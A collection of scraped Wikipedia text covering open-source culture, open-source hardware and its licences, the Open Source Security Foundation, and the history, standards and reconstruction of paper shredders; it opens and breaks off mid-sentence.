composed of individual hardware/software developers, hobbyists, as well as very large companies. Examples of open-source hardware initiatives are: Some publishers ofopen-accessjournals have argued thatdatafromfood scienceandgastronomystudies should be freely available to aidreproducibility.[54]A number of people have published creative commons licensed recipe books.[55] An open-source robot is arobotwhose blueprints, schematics, or source code are released under an open-source model. Free and open-source software(FOSS) orfree/libre and open-source software(FLOSS) is openly shared source code that is licensed without any restrictions on usage, modification, or distribution.[citation needed]Confusion persists about this definition because the "free", also known as "libre", refers to the freedom of the product, not the price, expense, cost, or charge. For example, "being free to speak" is not the same as "free beer".[19] Conversely, Richard Stallman argues the "obvious meaning" of term "open source" is that the source code is public/accessible for inspection, without necessarily any other rights granted, although the proponents of the term say the conditions in theOpen Source Definitionmust be fulfilled.[81] "Free and open" should not be confused with public ownership (state ownership), deprivatization (nationalization), anti-privatization (anti-corporate activism), ortransparent behavior.[citation needed] Generally, open source refers to a computer program in which thesource codeis available to the general public for use for any (including commercial) purpose, or modification from its original design. Open-source code is meant to be a collaborative effort, where programmers improve upon the source code and share the changes within the community. Code is released under the terms of asoftware license. Depending on the license terms, others may then download, modify, and publish their version (fork) back to the community. The rise of open-source culture in the 20th century resulted from a growing tension between creative practices that involve require access to content that is oftencopyrighted, and restrictive intellectual property laws and policies governing access to copyrighted content. The two main ways in which intellectual property laws became more restrictive in the 20th century were extensions to the term of copyright (particularly in the United States) and penalties, such as those articulated in theDigital Millennium Copyright Act(DMCA), placed on attempts to circumvent anti-piracy technologies.[82] Although artistic appropriation is often permitted underfair-usedoctrines, the complexity and ambiguity of these doctrines create an atmosphere of uncertainty among cultural practitioners. Also, the protective actions of copyright owners create what some call a "chilling effect" among cultural practitioners.[83] The idea of an "open-source" culture runs parallel to "Free Culture", but is substantively different.Free cultureis a term derived from thefree software movement, and in contrast to that vision of culture, proponents of open-source culture (OSC) maintain that some intellectual property law needs to exist to protect cultural producers. Yet they propose a more nuanced position than corporations have traditionally sought. Instead of seeing intellectual property law as an expression of instrumental rules intended to uphold either natural rights or desirable outcomes, an argument for OSC takes into account diverse goods (as in "the Good life"[clarification needed]) and ends. Sites such asccMixteroffer up free web space for anyone willing to license their work under aCreative Commonslicense. The resulting cultural product is then available to download free (generally accessible) to anyone with an Internet connection.[84]Older, analog technologies such as the telephone or television have limitations on the kind of interaction users can have. Through various technologies such aspeer-to-peernetworks andblogs, cultural producers can take advantage of vastsocial networksto distribute their products. As opposed to traditional media distribution, redistributing digital media on the Internet can be virtually costless. Technologies such asBitTorrentandGnutellatake advantage of various characteristics of the Internet protocol (TCP/IP) in an attempt to totally decentralize file distribution. Open-source ethics is split into two strands: Irish philosopherRichard Kearneyhas used the term "open-sourceHinduism" to refer to the way historical figures such asMohandas GandhiandSwami Vivekanandaworked upon this ancient tradition.[88] Open-source journalismformerly referred to the standard journalistic techniques of news gathering and fact checking, reflectingopen-source intelligence, a similar term used in military intelligence circles. Now,open-source journalismcommonly refers to forms of innovative publishing ofonline journalism, rather than the sourcing of news stories by a professional journalist. In the 25 December 2006 issue of TIME magazine this is referred to asuser created contentand listed alongside more traditional open-source projects such asOpenSolarisandLinux. Weblogs, or blogs, are another significant platform for open-source culture. Blogs consist of periodic, reverse chronologically ordered posts, using a technology that makes webpages easily updatable with no understanding of design, code, orfile transferrequired. While corporations, political campaigns and other formal institutions have begun using these tools to distribute information, many blogs are used by individuals for personal expression, political organizing, and socializing. Some, such asLiveJournalorWordPress, use open-source software that is open to the public and can be modified by users to fit their own tastes. Whether the code is open or not, this format represents a nimble tool for people to borrow and re-present culture; whereas traditional websites made the illegal reproduction of culture difficult to regulate, the mutability of blogs makes "open sourcing" even more uncontrollable since it allows a larger portion of the population to replicate material more quickly in the public sphere. Messageboardsare another platform for open-source culture. Messageboards (also known as discussion boards or forums), are places online where people with similar interests can congregate and post messages for the community to read and respond to. Messageboards sometimes have moderators who enforce community standards of etiquette such as banningspammers. Other common board features are private messages (where users can send messages to one another) as well as chat (a way to have a real time conversation online) and image uploading. Some messageboards usephpBB, which is a free open-source package. Where blogs are more about individual expression and tend to revolve around their authors, messageboards are about creating a conversation amongst its users where information can be shared freely and quickly. Messageboards are a way to remove intermediaries from everyday life—for instance, instead of relying on commercials and other forms of advertising, one can ask other users for frank reviews of a product, movie or CD. By removing the cultural middlemen, messageboards help speed the flow of information and exchange of ideas. OpenDocumentis anopendocument file formatfor saving and exchanging editable office documents such as text documents (including memos, reports, and books),spreadsheets, charts, and presentations. Organizations and individuals that store their data in an open format such as OpenDocument avoid beinglocked intoa single software vendor, leaving them free to switch software if their current vendor goes out of business, raises their prices, changes their software, or changes theirlicensingterms to something less favorable. Open-source movie productionis either an open call system in which a changing crew and cast collaborate in movie production, a system in which the result is made available for re-use by others or in which exclusively open-source products are used in the production. The 2006 movieElephants Dreamis said to be the "world's first open movie",[89]created entirely using open-source technology. An open-source documentary film has a production process allowing the open contributions of archival materialfootage, and other filmic elements, both in unedited and edited form, similar to crowdsourcing. By doing so, on-line contributors become part of the process of creating the film, helping to influence the editorial and visual material to be used in the documentary, as well as its thematic development. The first open-source documentary film is the non-profitWBCN and the American Revolution, which went into development in 2006, and will examine the role media played in the cultural, social and political changes from 1968 to 1974 through the story of radio station WBCN-FM in Boston.[90][91][92][93]The film is being produced by Lichtenstein Creative Media and the non-profit Center for Independent Documentary. Open Source Cinema is a website to create Basement Tapes, a feature documentary about copyright in the digital age, co-produced by the National Film Board of Canada.[94]Open-source film-makingrefers to a form of film-making that takes a method of idea formation from open-source software, but in this case the 'source' for a filmmaker is raw unedited footage rather than programming code. It can also refer to a method of film-making where the process of creation is 'open' i.e. a disparate group of contributors, at different times contribute to the final piece. Open-IPTVisIPTVthat is not limited to one recording studio, production studio, or cast. Open-IPTV uses the Internet or other means to pool efforts and resources together to create an online community that all contributes to a show. Within the academic community, there is discussion about expanding what could be called the "intellectual commons" (analogous to theCreative Commons). Proponents of this view have hailed theConnexionsProject atRice University,OpenCourseWareproject atMIT,Eugene Thacker's article on "open-source DNA", the "Open Source Cultural Database",Salman Khan'sKhan Academyand Wikipedia as examples of applying open source outside the realm of computer software. Open-source curriculaare instructional resources whose digital source can be freely used, distributed and modified. Another strand to the academic community is in the area of research. Many funded research projects produce software as part of their work. Due to the benefits of sharing software openly in scientific endeavours,[95]there is an increasing interest in making the outputs of research projects available under an open-source license. In the UK theJoint Information Systems Committee (JISC)has developed a policy on open-source software. JISC also funds a development service calledOSS Watchwhich acts as an advisory service for higher and further education institutions wishing to use, contribute to and develop open-source software. On 30 March 2010, President Barack Obama signed the Health Care and Education Reconciliation Act, which included $2 billion over four years to fund theTAACCCT program, which is described as "the largest OER (open education resources) initiative in the world and uniquely focused on creating curricula in partnership with industry for credentials in vocational industry sectors like manufacturing, health, energy, transportation, and IT".[96] The principle of sharing pre-dates the open-source movement; for example, the free sharing of information has been institutionalized in the scientific enterprise since at least the 19th century. Open-source principles have always been part of the scientific community. The sociologistRobert K. Mertondescribed the four basic elements of the community—universalism (an international perspective), communalism (sharing information), objectivity (removing one's personal views from the scientific inquiry) and organized skepticism (requirements of proof and review) that describe the (idealised) scientific community. These principles are, in part, complemented by US law's focus on protecting expression and method but not the ideas themselves. There is also a tradition of publishing research results to the scientific community instead of keeping all such knowledge proprietary. One of the recent initiatives in scientific publishing has beenopen access—the idea that research should be published in such a way that it is free and available to the public. There are currently many open access journals where the information is available free online, however most journals do charge a fee (either to users or libraries for access). TheBudapest Open Access Initiativeis an international effort with the goal of making all research articles available free on the Internet. TheNational Institutes of Healthhas recently proposed a policy on "Enhanced Public Access to NIH Research Information". This policy would provide a free, searchable resource of NIH-funded results to the public and with other international repositories six months after its initial publication. The NIH's move is an important one because there is significant amount of public funding in scientific research. Many of the questions have yet to be answered—the balancing of profit vs. public access, and ensuring that desirable standards and incentives do not diminish with a shift to open access. Benjamin Franklinwas an early contributor eventually donating all his inventions including theFranklin stove,bifocals, and thelightning rodto the public domain. New NGO communities are starting to use the open-source technology as a tool. One example is the Open Source Youth Network started in 2007 in Lisboa by ISCA members.[97]Open innovationis also a new emerging concept which advocate putting R&D in a common pool. TheEclipseplatform is openly presenting itself as an Open innovation network.[98] Copyright protection is used in the performing arts and even in athletic activities. Some groups have attempted to remove copyright from such practices.[99] In 2012, Russian music composer, scientist andRussian Pirate PartymemberVictor Argonovpresented detailed raw files of his electronic opera "2032"[100]under free licenseCC BY-NC 3.0(later relicensed underCC BY-SA 4.0[101]). This opera was originally composed and published in 2007 by Russian labelMC Entertainmentas a commercial product, but then the author changed its status to free. In his blog[102]he said that he decided to open raw files (including wav, midi and other used formats) to the public to support worldwide pirate actions againstSOPAandPIPA. Several Internet resources called "2032" the first open-source musical opera in history.[103][104][105][106] Notable events and applications that have been developed via theopen source community, and echo the ideologies of the open source movement,[107]include theOpen Education Consortium,Project Gutenberg, Synthethic Biology, and Wikipedia. The Open Education Consortium is an organization composed of various colleges that support open source and share some of their material online. This organization, headed byMassachusetts Institute of Technology, was established to aid in the exchange of open source educational materials. Wikipedia is a user-generatedonline encyclopediawith sister projects in academic areas, such asWikiversity—a community dedicated to the creation and exchange of learning materials.[108][failed verification] Prior to the existence ofGoogle ScholarBeta, Project Gutenberg was the first supplier ofelectronic booksand the first free library project.[108][failed verification]Synthetic Biology is a new technology that promises to enable cheap, lifesaving new drugs, as well as helping to yield biofuels that may help to solve our energy problem. Although synthetic biology has not yet come out of its lab stage, it has potential to become industrialized in the near future. To industrialize open source science, there are some scientists who are trying to build their own brand of it.[109] Theopen-access movementis a movement that is similar in ideology to the open source movement. Members of this movement maintain that academic material should be readily available to provide help with "future research, assist in teaching and aid in academic purposes." The open-access movement aims to eliminate subscription fees and licensing restrictions of academic materials.[110]Thefree-culture movementis a movement that seeks to achieve a culture that engages in collective freedom via freedom of expression, free public access to knowledge and information, full demonstration of creativity and innovation in various arenas, and promotion of citizen liberties.[111][citation needed]Creative Commonsis an organization that "develops, supports, and stewards legal and technical infrastructure that maximizes digital creativity, sharing, and innovation." It encourages the use of protected properties online for research, education, and creative purposes in pursuit of a universal access. Creative Commons provides an infrastructure through a set of copyright licenses and tools that creates a better balance within the realm of "all rights reserved" properties.[112]The Creative Commons license offers a slightly more lenient alternative to "all rights reserved" copyrights for those who do not wish to exclude the use of their material.[113] The Zeitgeist Movement(TZM) is an international social movement that advocates a transition into asustainable"resource-based economy" based oncollaborationin which monetary incentives are replaced by commons-based ones with everyonehaving accessto everything (from code to products) as in "open source everything".[114][115]While its activism and events are typically focused on media and education, TZM is a major supporter of open source projects worldwide since they allow for uninhibited advancement of science and technology, independent of constraints posed by institutions of patenting and capitalist investment.[116]P2P Foundation is an "international organization focused on studying, researching, documenting and promotingpeer to peer practicesin a very broad sense." Its objectives incorporate those of the open source movement, whose principles are integrated in a larger socio-economic model.[117]
https://en.wikipedia.org/wiki/Open_source
Open-source hardware(OSH,OSHW) consists of physicalartifactsof technology designed and offered by theopen-design movement. Bothfree and open-source software(FOSS) and open-source hardware are created by thisopen-source culturemovement and apply a like concept to a variety of components. It is sometimes, thus, referred to asfree and open-source hardware(FOSH), meaning that the design is easily available ("open") and that it can be used, modified and shared freely ("free").[citation needed]The term usually means that information about the hardware is easily discerned so that others can make it – coupling it closely to themaker movement.[1]Hardware design (i.e. mechanical drawings,schematics,bills of material,PCBlayout data,HDLsource code[2]andintegrated circuitlayout data), in addition to the software thatdrivesthe hardware, are all released under free/libreterms. The original sharer gains feedback and potentially improvements on the design from the FOSH community. There is now significant evidence that such sharing can drive a highreturn on investmentfor the scientific community.[3] It is not enough to merely use anopen-source license; an open source product or project will follow open source principles, such asmodular designandcommunity collaboration.[4][5][6] Since the rise of reconfigurableprogrammable logic devices, sharing of logic designs has been a form of open-source hardware. Instead of the schematics,hardware description language(HDL) code is shared. HDL descriptions are commonly used to set upsystem-on-a-chipsystems either infield-programmable gate arrays(FPGA) or directly inapplication-specific integrated circuit(ASIC) designs. HDL modules, when distributed, are calledsemiconductor intellectual property cores, also known as IP cores. Open-source hardware also helps alleviate the issue ofproprietary device driversfor the free and open-source software community, however, it is not a pre-requisite for it, and should not be confused with the concept of open documentation for proprietary hardware, which is already sufficient for writing FLOSS device drivers and complete operating systems.[7][8]The difference between the two concepts is that OSH includes both the instructions on how to replicate the hardware itself as well as the information on communication protocols that the software (usually in the form ofdevice drivers) must use in order to communicate with the hardware (often called register documentation, or open documentation for hardware[7]), whereas open-source-friendly proprietary hardware would only include the latter without including the former. The first hardware-focused "open source" activities were started around 1997 byBruce Perens, creator of theOpen Source Definition, co-founder of theOpen Source Initiative, and aham radio operator. He launched the Open Hardware Certification Program, which had the goal of allowing hardware manufacturers to self-certify their products as open.[9][10] Shortly after the launch of the Open Hardware Certification Program, David Freeman announced the Open Hardware Specification Project (OHSpec), another attempt at licensing hardware components whose interfaces are available publicly and of creating an entirely new computing platform as an alternative to proprietary computing systems.[11]In early 1999, Sepehr Kiani, Ryan Vallance and Samir Nayfeh joined efforts to apply the open-source philosophy to machine design applications. Together they established the Open Design Foundation (ODF)[12]as a non-profit corporation and set out to develop anOpen DesignDefinition. However, most of these activities faded out after a few years. A "Free Hardware" organization, known as FreeIO, was started in the late 1990s by Diehl Martin, who also launched a FreeIO website in early 2000. In the early to mid 2000s, FreeIO was a focus of free/open hardware designs released under theGNU General Public License. The FreeIO project advocated the concept of Free Hardware and proposed four freedoms that such hardware provided to users, based on the similar freedoms provided by free software licenses.[13]The designs gained some notoriety due to Martin's naming scheme in which each free hardware project was given the name of a breakfast food such as Donut, Flapjack, Toast, etc. Martin's projects attracted a variety of hardware and software developers as well as other volunteers. Development of new open hardware designs at FreeIO ended in 2007 when Martin died of pancreatic cancer but the existing designs remain available from the organization's website.[14] By the mid 2000s open-source hardware again became a hub of activity due to the emergence of several major open-source hardware projects and companies, such asOpenCores,RepRap(3D printing),Arduino,Adafruit,SparkFun, andOpen Source Ecology. In 2007, Perens reactivated the openhardware.org website, but it's currently (February 2025) inactive. Following theOpen Graphics Project, an effort to design, implement, and manufacture a free and open 3D graphics chip set and reference graphics card, Timothy Miller suggested the creation of an organization to safeguard the interests of the Open Graphics Project community. Thus, Patrick McNamara founded theOpen Hardware Foundation(OHF) in 2007.[15] TheTucson Amateur Packet Radio Corporation(TAPR), founded in 1982 as a non-profit organization of amateur radio operators with the goals of supporting R&D efforts in the area of amateur digital communications, created in 2007 the first open hardware license, theTAPR Open Hardware License. TheOSIpresidentEric S. Raymondexpressed some concerns about certain aspects of the OHL and decided to not review the license.[16] Around 2010 in context of theFreedom Definedproject, theOpen Hardware Definitionwas created as collaborative work of many[17]and is accepted as of 2016 by dozens of organizations and companies.[18] In July 2011, CERN (European Organization for Nuclear Research) released an open-source hardware license,CERN OHL. Javier Serrano, an engineer at CERN's Beams Department and the founder of the Open Hardware Repository, explained: "By sharing designs openly, CERN expects to improve the quality of designs through peer review and to guarantee their users – including commercial companies – the freedom to study, modify and manufacture them, leading to better hardware and less duplication of efforts".[19]While initially drafted to address CERN-specific concerns, such as tracing the impact of the organization's research, in its current form it can be used by anyone developing open-source hardware.[20] Following the 2011 Open Hardware Summit, and after heated debates on licenses and what constitutes open-source hardware, Bruce Perens abandoned the OSHW Definition and the concerted efforts of those involved with it.[21]Openhardware.org, led by Bruce Perens, promotes and identifies practices that meet all the combined requirements of the Open Source Hardware Definition, the Open Source Definition, and the Four Freedoms of theFree Software Foundation[22]Since 2014 openhardware.org is not online and seems to have ceased activity.[23] TheOpen Source Hardware Association(OSHWA) at oshwa.org acts as hub of open-source hardware activity of all genres, while cooperating with other entities such as TAPR, CERN, and OSI. The OSHWA was established as an organization in June 2012 in Delaware and filed for tax exemption status in July 2013.[24]After some debates about trademark interferences with the OSI, in 2012 the OSHWA and the OSI signed a co-existence agreement.[25][26] TheFOSSi Foundationis founded in 2015 as aUK-based non-profit to promote and protect the open source silicon chip movement, roughly a year after the official release ofRISC-Varchitecture.[27] TheFree Software Foundationhas suggested an alternative "free hardware" definition derived from theFour Freedoms.[28][29] The termhardwarein open-source hardware has been historically used in opposition to the termsoftwareof open-source software. That is, to refer to the electronic hardware on which the software runs (see previous section). However, as more and more non-electronic hardware products are made open source (for exampleWikiHouse, OpenBeam or Hovalin), this term tends to be used back in its broader sense of "physical product". The field of open-source hardware has been shown to go beyond electronic hardware and to cover a larger range of product categories such as machine tools, vehicles and medical equipment.[30]In that sense,hardwarerefers to any form of tangible product, be it electronic hardware, mechanical hardware, textile or even construction hardware. The Open Source Hardware (OSHW) Definition 1.0 defines hardware as "tangible artifacts — machines, devices, or other physical things".[31] Electronics is one of the most popular types of open-source hardware.PCBbased designs can be published similarly to software as CAD files, which users can send directly to PCB fabrication companies to receive hardware in the mail. Alternatively, users can obtain components and solder them together themselves. There are many companies that provide large varieties of open-source electronics such asSparkfun,Adafruit, and Seeed. In addition, there areNPOsand companies that provide a specific open-source electronic component such as theArduinoelectronics prototyping platform. There are many examples of specialty open-source electronics such as low-cost voltage and currentGMAWopen-source 3-D printer monitor[32][33]and a robotics-assistedmass spectrometryassay platform.[34][35]Open-source electronics finds various uses, including automation of chemical procedures.[36][37] Open Standard chip designs are now common.OpenRISC(2000 - LGPL / GPL),OpenSparc(2005 - GPLv2), andRISC-V(2010 - Open Standard, free to implement for non-commercial purposes), are examples of free to useinstruction set architecture. OpenCoresis a large library of standard chip design subcomponents which can be combined into larger designs. Complete open source software stacks and shuttle fabrication services are now available which can take OSH chip designs fromhardware description languagesto masks andASICfabrication on maker-scale budgets.[38] Purely mechanical OSH designs include mechanical components, machine tools, and vehicles.Open Source Ecologyis a large project which seeks to develop a complete ecosystem of mechanical tools and components which aim to be able to replicate themselves. Open-source vehicles have also been developed including bicycles like XYZ Space Frame Vehicles and cars such as the Tabby OSVehicle. Most OSH systems combine elements of electronics and mechanics to formmechatronicssystems. A large range of open-sourcemechatronicproducts have been developed, including machine tools, musical instruments, and medical equipment.[30] Examples of open-source machine tools include 3D printers such asRepRap,Prusa, andUltimaker, 3D printer filament extruders such as polystruder[39]XR PRO as well as the laser cutterLasersaur. Examples of open source medical equipment includeopen-source ventilators, the echostethoscope echOpen (co-founded byMehdi Benchoufi, Olivier de Fresnoye, Pierre Bourrier and Luc Jonveaux[40]), and a wide range of prosthetic hands listed in the review study by Ten Kateet.al.[41](e.g. OpenBionics' Prosthetic Hands). Open source roboticscombines open source hardware mechatronics with open source AI and control software. Due to the mixture of hardware and software it serves as a particularly active area for open source ideas to move between them. Examples of open-source hardware products can also be found to a lesser extent in construction (Wikihouse), textile (Kit Zéro Kilomètres), and firearms (3D printed firearm,Defense Distributed). Rather than creating a new license, some open-source hardware projects use existing,free and open-source softwarelicenses.[42]These licenses may not accord well withpatent law.[43] Later, several new licenses were proposed, designed to address issues specific to hardware design.[44]In these licenses, many of the fundamental principles expressed in open-source software (OSS) licenses have been "ported" to their counterpart hardware projects. Newhardware licensesare often explained as the "hardware equivalent" of a well-known OSS license, such as theGPL,LGPL, orBSD license. Despite superficial similarities tosoftware licenses, most hardware licenses are fundamentally different: by nature, they typically rely more heavily onpatentlaw than oncopyrightlaw, as many hardware designs are not copyrightable.[45]Whereas a copyright license may control the distribution of the source code or design documents, a patent license may control the use and manufacturing of the physical device built from the design documents. This distinction is explicitly mentioned in the preamble of theTAPR Open Hardware License: "... those who benefit from an OHL design may not bring lawsuits claiming that design infringes their patents or other intellectual property." Noteworthy licenses include: TheOpen Source Hardware Associationrecommends seven licenses which follow theiropen-source hardware definition.[51]From the general copyleft licenses theGNU General Public License(GPL) andCreative Commons Attribution-ShareAlikelicense, from the hardware-specific copyleft licenses theCERN Open Hardware License(OHL) andTAPR Open Hardware License(OHL) and from thepermissive licensestheFreeBSD license, theMIT license, and theCreative Commons Attributionlicense.[52]Openhardware.org recommended in 2012 the TAPR Open Hardware License, Creative Commons BY-SA 3.0 and GPL 3.0 license.[53] Organizations tend to rally around a shared license. For example,OpenCoresprefers theLGPLor aModified BSD License,[54]FreeCoresinsists on theGPL,[55]Open Hardware Foundationpromotes "copyleftor other permissive licenses",[56]theOpen Graphics Projectuses[57]a variety of licenses, including theMIT license,GPL, and a proprietary license,[58]and theBalloon Projectwrote their own license.[59] The adjective "open-source" not only refers to a specific set of freedoms applying to a product, but also generally presupposes that the product is the object or the result of a "process that relies on the contributions of geographically dispersed developers via theInternet."[60]In practice however, in both fields of open-source hardware and open-source software, products may either be the result of a development process performed by a closed team in a private setting or by a community in a public environment, the first case being more frequent than the second which is more challenging.[30]Establishing a community-based product development process faces several challenges such as: to find appropriate product data management tools, document not only the product but also the development process itself, accepting losing ubiquitous control over the project, ensure continuity in a context of fickle participation of voluntary project members, among others.[61] One of the major differences between developing open-source software and developing open-source hardware is that hardware results in tangible outputs, which cost money to prototype and manufacture. As a result, the phrase "free as in speech, not as in beer",[62]more-formally known asgratis versus libre, distinguishes between the idea of zero cost and the freedom to use and modify information. While open-source hardware faces challenges in minimizing cost and reducing financial risks for individual project developers, some community members have proposed models to address these needs[63]Given this, there are initiatives to develop sustainable community funding mechanisms, such as the Open Source Hardware Central Bank. Extensive discussion has taken place on ways to make open-source hardware as accessible asopen-source software. Providing clear and detailed product documentation is an essential factor facilitating product replication and collaboration in hardware development projects. Practical guides have been developed to help practitioners to do so.[64]Another option is to design products so they are easy to replicate, as exemplified in the concept ofopen-source appropriate technology.[65] The process of developing open-source hardware in a community-based setting is alternatively calledopen design, open source development[66]oropen source product development.[67]All these terms are examples of theopen-source modelapplicable for the development of any product, including software, hardware, cultural and educational. Does open design and open-source hardware design process involves new design practices, or raises requirements for new tools? is the question of openness really key in OSH?.[68]Seeherefor a delineation of these terms. A major contributor to the production of open-source hardware product designs is the scientific community. There has been considerable work to produce open-source hardware for scientific hardware using a combination of open-source electronics and3-D printing.[69][70][71]Other sources of open-source hardware production are vendors of chips and other electronic components sponsoring contests with the provision that the participants and winners must share their designs.Circuit Cellarmagazine organizes some of these contests. A guide has been published (Open-Source Lab (book)byJoshua Pearce) on usingopen-source electronicsand3D printingto makeopen-source labs. Today, scientists are creating many such labs. Examples include: Open hardware companies are experimenting withbusiness models.[75]For example,littleBitsimplementsopen-source business modelsby making available the circuit designs in each electronics module, in accordance with theCERN Open Hardware License Version1.2.[76]Another example isArduino, which registered its name as atrademark; others may manufacture products from Arduino designs but cannot call the products Arduino products.[77]There are many applicable business models for implementing some open-source hardware even in traditional firms. For example, to accelerate development and technical innovation, thephotovoltaicindustry has experimented with partnerships, franchises, secondary supplier and completely open-source models.[78] Recently, many open-source hardware projects have been funded viacrowdfundingon platforms such asIndiegogo,Kickstarter, orCrowd Supply.[79] Richard Stallman, the founder of thefree softwaremovement, was in 1999 skeptical on the idea and relevance offree hardware(his terminology for what is now known as open-source hardware).[80]In a 2015 article inWiredMagazine, he modified this attitude; he acknowledged the importance of free hardware, but still saw no ethical parallel with free software.[28]Also, Stallman prefers the termfree hardware designoveropen source hardware, a request which is consistent with his earlier rejection of the termopen source software(see alsoAlternative terms for free software).[28] Other authors, such as ProfessorJoshua Pearcehave argued there is an ethical imperative for open-source hardware – specifically with respect toopen-source appropriate technologyforsustainable development.[81]In 2014, he also wrote the bookOpen-Source Lab: How to Build Your Own Hardware and Reduce Research Costs, which details the development offree and open-source hardwareprimarily forscientistsand universityfaculty.[82]Pearce in partnership with Elsevier introduced a scientific journalHardwareX. It has featured many examples of applications of open-source hardware for scientific purposes. Further,Vasilis Kostakis[et]et al[83]have argued that open-source hardware may promote values of equity, diversity and sustainability. Open-source hardware initiative transcend traditional dichotomies of global-local, urban-rural, and developed-developing contexts. They may leverage cultural differences, environmental conditions, and local needs/resources, while embracing hyper-connectivity, to foster sustainability and collaboration rather than conflict.[83]However, open-source hardware does face some challenges and contradictions. It must navigate tensions between inclusiveness, standardization, and functionality.[83]Additionally, while open-source hardware may reduce pressure on natural resources and local populations, it still relies on energy- and material-intensive infrastructures, such as the Internet. Despite these complexities, Kostakis et al argue, the open-source hardware framework can serve as a catalyst for connecting and unifying diverse local initiatives under radical narratives, thus inspiring genuine change.[83] OSH has grown as an academic field through the two journalsJournal of Open Hardware(JOH) andHardwareX. These journals compete to publish the best OSH designs, and each define their own requirements for what constitutes acceptable quality of design documents, including specific requirements for build instructions, bill of materials, CAD files, and licences. These requirements are often used by other OSH projects to define how to do an OSH release. These journals also publish papers contributing to the debate about how OSH should be defined and used.
https://en.wikipedia.org/wiki/Open-source_hardware
TheOpen Source Security Foundation(OpenSSF) is a cross-industry forum for collaborative improvement ofopen-source software security.[2][3]Part of theLinux Foundation, the OpenSSF works on various technical and educational initiatives to improve the security of the open-source software ecosystem.[4] The OpenSSF was formed in August 2020 as the successor to theCore Infrastructure Initiative, another Linux Foundation project.[5][6] In October 2021,Brian Behlendorfwas announced as the OpenSSF's first full-time general manager.[7]In May 2023, OpenSSF announcedOmkhar Arasaratnamas its new general manager, and Behlendorf became CTO of the organization.[8] The OpenSSF houses various initiatives under its 10 current working groups.[9][10]The OpenSSF also houses two projects: the code signing and verification service Sigstore[11]and Alpha-Omega, a large-scale effort to improve software supply chain security.[12] TheWhite Househeld a meeting on software security with government and private sector stakeholders on January 13, 2022.[13]In May 2022, the OpenSSF hosted a follow-up meeting, the Open Source Software Security Summit II, where participants from industry agreed on a 10-point Open Source Software Security Mobilization Plan, which received $30 million in funding commitments.[14][15]In August 2023, the OpenSSF served as an advisor forDARPA's AI Cyber Challenge (AIxCC), a competition around innovation around AI and cybersecurity.[16]In September 2023, the OpenSSF hosted the Secure Open Source Software Summit with the White House, where government agencies and companies discussed security challenges and initiatives around open source software.[17]
https://en.wikipedia.org/wiki/Open_Source_Security_Foundation
Apaper shredderis a mechanical device used to cut sheets ofpaperinto either strips or fine particles. Government organizations, businesses, and private individuals use shredders to destroy private,confidential, or otherwise sensitive documents. The first paper shredder is credited toinventorAbbot Augustus Low, whosepatentwas filed on February 2, 1909.[1]His invention was never manufactured because he died prematurely soon after filing the patent.[2] Adolf Ehinger's paper shredder, based on a hand-crankpasta maker, was the first to be manufactured in 1935 in Germany. Supposedly he created a shredding machine to shred hisanti-Nazileaflets to avoid the inquiries of the authorities.[3]Ehinger later marketed and began selling his patented shredders to government agencies and financial institutions switching from hand-crank shredders to electric motor shredders.[2]Ehinger's company, EBA Maschinenfabrik, manufactured the first cross-cut paper shredders in 1959 and continues to do so today as EBA Krug & Priester GmbH & Co. inBalingen. Before thefall of the Berlin Wall, a “wet shredder” was invented in the formerGerman Democratic Republic. To prevent paper shredders in theMinistry for State Security (Stasi)from glutting, this device mashed paper snippets withwater.[2] With a shift from paper to digital document production, modern industrial shredders have been designed to process non-paper media, such ascredit cardsandCDs.[2] Until the mid-1980s, it was rare for paper shredders to be used by non-government entities. A prominent example of their use was when theU.S. embassy in Iranused shredders to reducepaperpages to strips beforethe embassy was taken over in 1979. Some documents were reconstructed from the strips, as detailed below. After ColonelOliver NorthtoldCongressthat he used a Schleicher cross-cut model to shredIran-Contradocuments, sales increased nearly 20 percent in 1987.[4] Paper shredders became more popular among U.S. citizens withprivacyconcerns after the 1988Supreme Courtdecision inCalifornia v. Greenwood; in which the Supreme Court of the United States held that theFourth Amendmentdoes not prohibit the warrantless search and seizure of garbage left for collection outside of a home. Anti-burning laws also resulted in increased demand for paper shredding. More recently, concerns aboutidentity thefthave driven increased personal use of paper shredders,[5]with the US Federal Trade Commission recommending that individuals shred financial documents before disposal.[6] Information privacylaws such asFACTA,HIPAA, and theGramm–Leach–Bliley Actdrive shredder usage, as businesses and individuals take steps to securely dispose of confidential information. Shredders range in size and price. Small, inexpensive units are designed for a certain number of pages. Large, expensive units are used by commercial shredding services and can shred millions of documents per hour. While the smallest shredders may be hand-cranked, most shredders are electric. Over time, new features were added to improve user experience, including rejecting paper over capacity to avoid jams, and other safety features to reduce risk.[7][8]Some shredders designed for use in shared workspaces or department copy rooms have noise reduction.[citation needed] Large organizations or shredding services sometimes use "mobile shredding trucks", typically constructed as abox truckwith an industrial-size paper shredder mounted inside with storage space for shredded materials. Such units may also provide the shredding ofCDs,DVDs,hard drives,credit cards, anduniforms, among other things.[9] A 'shredding kiosk' is anautomated retailmachine (orkiosk) that allows public access to a commercial or industrial-capacity paper shredder. This is an alternative solution to the use of a personal or business paper shredder, where the public can use a faster and more powerful shredder, paying for each shredding event rather than purchasing shredding equipment.[citation needed] Some companiesoutsourcetheir shredding to 'shredding services'. These companies either shred on-site, with mobile shredder trucks or have off-site shredding facilities. Documents slated for shredding are often placed in locked bins that are emptied periodically. As well as size and capacity, shredders are classified according to the method they use; and the size and shape of the shreds they produce. There is a number of standards covering the security levels of paper shredders, including: The previousDIN32757 standard has now been replaced with DIN 66399. This is complex,[10]but can be summarized as below: TheUnited StatesNational Security AgencyandCentral Security Serviceproduce "NSA/CSS Specification 02-01 for High Security Crosscut Paper Shredders". They provide a list of evaluated shredders.[11] TheInternational Organization for Standardizationand theInternational Electrotechnical Commissionproduce "ISO/IEC 21964 Information technology — Destruction of data carriers".[12][13][14]TheGeneral Data Protection Regulation(GDPR), which came into force in May 2018, regulates the handling and processing of personal data. ISO/IEC 21964 and DIN 66399 support data protection in business processes.[citation needed] There have been many instances where it is alleged that documents have been improperly or illegally destroyed by shredding, including: For paper shredders to achieve their purpose, it should not be possible to reassemble and read shredded documents. In practice, this depends on how well the shredding has been done, and the resources put into reconstruction. The amount of effort put into reconstruction often depends on the importance of the document, e.g. whether it is a simple personal matter,corporate espionage, a criminal matter, or a matter ofnational security. The difficulty of reconstruction can depend on the size and legibility of the text, whether the document is single- or double-sided, the size and shape of the shredded pieces, the orientation of the material when fed, how effectively the shredded material is further randomized afterwards, and whether other processes such as pulping and chemical decomposition are used. Even without a full reconstruction, in some cases useful information can be obtained by forensic analysis of the paper, ink, and cutting method. The individual shredder that was used to destroy 